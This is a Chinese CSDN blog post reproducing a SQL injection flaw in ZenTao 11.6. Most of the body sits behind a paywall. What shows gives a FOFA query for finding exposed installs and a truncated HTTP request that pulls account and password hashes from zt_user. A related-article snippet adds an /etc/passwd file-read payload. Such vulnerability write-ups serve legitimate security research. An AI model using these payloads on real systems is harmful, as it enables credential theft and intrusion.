禅道 11.6 zentao/api-getModel-api-sql-sql 存在SQL注入漏洞

sublime88

已于 2023-04-19 23:02:06 修改

阅读量727

点赞数

分类专栏：漏洞复现文章标签： sql 安全 web安全

于 2023-04-13 15:18:24 首次发布

本文链接：https://blog.csdn.net/nnn2188185/article/details/130131268

版权

漏洞复现专栏收录该内容

123 篇文章 18 订阅 ¥15.90 ¥99.00

订阅专栏

超级会员免费看

本文详细介绍了禅道项目管理软件11.6版本中的一个SQL注入漏洞，该漏洞源于用户接口权限过滤不足。影响版本为11.6，可通过fofa查询工具进行搜索。漏洞复现包括访问特定URL触发问题，整改建议是关注官方更新以获取修复方案。

摘要由CSDN通过智能技术生成

文章目录

禅道 11.6 zentao/api-getModel-api-sql-sql 存在SQL注入漏洞

禅道 11.6 zentao/api-getModel-api-sql-sql 存在SQL注入漏洞

1. 禅道简介

微信公众号搜索：南风漏洞复现文库
南风漏洞复现文库公众号首发

禅道项目管理软件是国产的开源项目管理软件，专注研发项目管理，内置需求管理、任务管理、bug 管理、缺陷管理、用例管理、计划发布等功能，实现了软件的完整生命周期管理。

2.漏洞描述

禅道 11.6 zentao/api-getModel-api-sql-sql 版本中对用户接口调用权限过滤不完善，导致调用接口存在SQL注入漏洞。

3.影响版本

禅道 11.6

4.fofa 查询语句

“禅道项目管理系统”

5.漏洞复现

漏洞数据包

GET /zentao/api-getModel-api-sql-sql=select+account,password+from+zt_user HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-En

了解本专栏

订阅专栏解锁全文

超级会员免费看

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

sublime88

关注关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
打赏
3
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

订阅专栏

【禅道 16.5 router.class.php SQL注入漏洞复现】

weixin_45530380的博客

08-14

586

【代码】【禅道 16.5 router.class.php SQL注入漏洞复现】

禅道linux一键安装漏洞,禅道免登陆SQL注入漏洞复现

weixin_39552768的博客

05-17

1411

一、漏洞简介该漏洞影响版本为禅道8.2--9.2.1，禅道项目管理软件集产品管理、项目管理、质量管理、文档管理、组织管理和事务管理于一体，是一款功能完备的项目管理软件，完美地覆盖了项目管理的核心流程。漏洞出现在系统orm框架中，在拼接order by的语句过程的时候，未对limit部分过滤并直接拼接，导致攻击者构造执行SQL语句。在mysql权限配置不当的情况下，攻击者可利用该漏洞获取webshe...

3 条评论您还未登录，请先登录后发表或查看评论

【漏洞复现】禅道——未授权登入（QVD-2024-15263）

最新发布

LongL_GuYu的博客

07-06

1119

禅道（Zentao）是一款开源的项目管理和协作软件。禅道项目管理系统中的存在QVD-2024-15263身份认证绕过漏洞。攻击者可利用该漏洞创建任意账号实现未授权登录。

禅道V16.5SQL注入漏洞（CNVD-2022-42853）

RestoreJustice的博客

03-23

773

禅道项目管理软件是一款国产的、基于LGPL协议、开源免费的项目管理软件，它集产品管理、项目管理、测试管理于一体，同时还包含了事务管理、组织管理等诸多功能，是中小型企业项目管理的首选，基于自主的PHP开发框架──ZenTaoPHP而成，第三方开发者或企业可非常方便的开发插件或者进行定制。在登录处未对用户输入的account参数内容作过滤校验，导致攻击者拼接恶意SQL语句执行，攻击者可利用漏洞获取数据库敏感信息。

禅道CMS 11.6漏洞

chaojixiaojingang

09-09

5049

一.SQL注入漏洞 Payload: http://127.0.0.1/zentaopms/www/api-getModel-api-sql-sql=select+account,password+from+zt_user 二.任意文件读取漏洞 Payload： http://127.0.0.1/zentaopms/www/api-getModel-file-parseCSV-fileName=/etc/passwd 三.远程代码执行漏洞 1）远程代码执行命令phpnifo()； P

zentao.sql

07-16

禅道数据库备份。sql文件。

调用接口登录禅道_调用禅道api创建新用户

weixin_35618933的博客

12-29

2057

调用禅道api创建新用户使用禅道API是一件非常麻烦的事，因为它没有详细的API文档。官方在网站内嵌的API文档极其简略，根本不知道需要传递什么参数。如何知道该如何使用它提供的API呢？你必须去看他在网页端发送的请求。举例：用户创建的请求image需要在浏览器中调用一边，而 API 接口，就出将请求地址中的.html改为.json，需要传递的参数是一样的。获取 session id想要使用禅道的 ...

api 二次开发禅道_api机制简介 - zentaoPHP二次开发 - 易企天创开发者中心

weixin_39627481的博客

12-22

628

一、API机制介绍：前面章节讲述的扩展机制是需要直接开发PHP或者html, css, js等代码。zentaoPHP还提供了API机制，方便大家来和其他的系统进行集成。API机制都是基于http协议的。返回的数据以json格式存储。zentaoPHP架共实现了两种API机制。一种为直接的页面调用，一种通过超级model调用接口，直接调用model层的方法，下面我们一一来看下。二、页面直接调用当你...

zentao_docker-compose:通过docker-compose构建zentao

05-25

Docker-撰写zentao练习部署 zentao网站提供了一个Docker部署映像，但是该映像是一个软件包，并且数据库没有单独部署。此处提供了docker-compose方法，该方法将数据库和PHP分为两个容器。还添加了AdMiner容器，以使...

禅道linux一键安装漏洞,禅道全版本rce漏洞复现笔记

weixin_30781567的博客

05-17

907

禅道全版本rce漏洞复现笔记漏洞说明禅道项目管理软件是一款国产的，基于LGPL协议，开源免费的项目管理软件，它集产品管理、项目管理、测试管理于一体，同时还包含了事务管理、组织管理等诸多功能，是中小型企业项目管理的首选，基于自主的PHP开发框架──ZenTaoPHP而成，第三方开发者或企业可非常方便的开发插件或者进行定制。此次发现的漏洞正是ZenTaoPHP框架中的通用代码所造成的的，因此禅道几乎所...

SQL注入漏洞原理分析

06-21

SQL注入漏洞原理分析

【组件攻击链】禅道项目管理系统(ZenTaoPMS)高危漏洞分析与利用

further_eye的博客

12-21

4763

近年来禅道漏洞频发，从2018年开始，每年都会爆出比较严重的高危漏洞，通过这些高危漏洞均可对服务器造成一定的影响，甚至可以获取服务器的最高权限。

【漏洞复现】金蝶 EAS createdatasource jndi 远程代码执行漏洞

qq_67810151的博客

04-03

333

金蝶 EAS 存在JNDI注入漏洞，未授权的攻击者可以通过该漏洞进行远程代码执行，导致服务器被控制。

当黑客就入门 ZenTaoPMS.6.2.stable任意文件上传漏洞复现

Tuye的博客

08-01

758

将源文件移动到phpstudy文件夹里，并解压 mv ZenTaoPMS.6.2.stable.zip /phpstudy/www/ unzip ZenTaoPMS.6.2.stable.zip 访问原文件 http://127.0.0.1/zentaopms/www/install.php

禅道16.5 SQL注入(CNVD-2022-42853)

qq_59975439的博客

11-26

3988

禅道16.5 SQL注入(CNVD-2022-42853)

zentao linux 伪静态,禅道pms路由及漏洞分析

weixin_28811007的博客

05-14

657

本帖最后由 xmidf 于 2018-9-29 09:28 编辑前言故事起源于一次校园网内扫描，扫到一台禅道的服务器，遂开始分析起了一些历史漏洞，但是由于版本原因在服务器上都没有成功文本分析了下禅道中路由的设置，以及一些历史漏洞，若有疏漏，还望斧正。路由分析路由是分析和审计cms前一个很重要的点，能了解整个cms的基本框架和代码流程。禅道各个版本中路由没有什么较大的变化，这里以9.1.2为例进行分...

Linux安装禅道11.6并进行漏洞复现

per_se_veran_ce的博客

08-27

2137

一、安装禅道 1、下载禅道11.6 wget https://www.zentao.net/dl/zentao/11.6/ZenTaoPMS.11.6.stable.zbox_64.tar.gz` 2、解压到opt目录下 sudo tar -zxvf ZenTaoPMS.11.6.stable.zbox_64.tar.gz -C /opt 3、开启Apache和Mysql /opt/zbox/zbox start 4、浏览器访问禅道登录页面 http://127.0.0.1/ 查看版本信息

记一次api接口SQL注入实战

m0_65247093的博客

04-30

3350

目录 0x01 思路：google hacking语法asmx?wsdl 0x02 发现两个接口并且能够异地调用 0x03 抓包repeat判断 0x04 暴库指导某迪导师 0x01 思路：google hacking语法asmx?wsdl 点击url：domain/WebServices/InboxWS.asmx 0x02 发现两个接口并且能够异地调用火狐中抓包测试 0x03 抓包repeat判断四个参数加 ' 报nynax错误由此推断可能存..

sudo docker run -d --name zentao -p 10011:80 -v /docker/zentao/www/zentaopms:/www/zentaopms -v /docker/zentao/www/mysqldata:/var/lib/mysql easysoft/zentao:latest

06-06

这是一个 Docker 命令，用于在后台运行一个名为 zentao 的容器，映射了本地的 10011 端口到容器内部的 80 端口，以及将本地的 /docker/zentao/www/zentaopms 目录映射到容器内部的 /www/zentaopms 目录，同时将本地...

禅道 11.6 zentao/api-getModel-api-sql-sql 存在SQL注入漏洞

文章目录

禅道 11.6 zentao/api-getModel-api-sql-sql 存在SQL注入漏洞

1. 禅道 简介

2.漏洞描述

3.影响版本

4.fofa 查询语句

5.漏洞复现

1. 禅道简介